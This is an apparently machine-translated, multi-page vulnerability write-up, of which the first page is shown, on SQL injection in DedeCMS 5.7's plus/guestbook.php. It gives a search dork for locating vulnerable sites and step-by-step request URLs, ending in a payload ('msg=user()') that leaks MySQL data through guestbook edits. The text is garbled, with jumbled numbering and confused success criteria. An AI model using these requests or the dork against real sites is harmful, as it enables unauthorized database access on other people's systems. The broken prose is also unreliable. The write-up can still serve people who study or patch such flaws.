-
Vulnerability description
-
Vulnerability trigger conditions 3. Vulnerability the range of 4. Vulnerability code analysis 5. Defense method 6. Offensive and defensive thinking
! Copy codes
1. Vulnerability description
Injection vulnerability success requires the following conditions
- php magic_quotes_gpc=off 2. Vulnerability file exists: plus/guestbook.php 3. In the database: dede_guestbook also requires the presence of
Relevant Link:
inurl:/plus/guestbook.php
2. Vulnerability trigger condition
! Copy codes
- http://localhost/dedecms5.7/plus/guestbook.php
- [Reply/edit]can see the visitor Message ID. Then write down the ID, for example: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&id=1
- Access: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&job=editok&msg=errs.cc’&id=1
- After the submission, if it is dede5. 7 version, then there will be"successfully changed or replying to a message", then it would prove that the modification is successful a 5. Then return to: http://localhost/dedecms5.7/plus/guestbook.php see the following modification of the message content is changed. errs.cc’ If Yes, then prove that this vulnerability cannot be reused should be for his opening: php magic_quotes_gpc=off
- If no modification is successful, then the Message ID of the content, or the previous, it would prove a vulnerability can be utilized. 7. Then again visit: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&job=editok&id=1&msg=‘,msg=user(),email=’
- Then return the Message ID of the contents modified directly into mysql. user().
! Copy codes
[1] [2] [3] next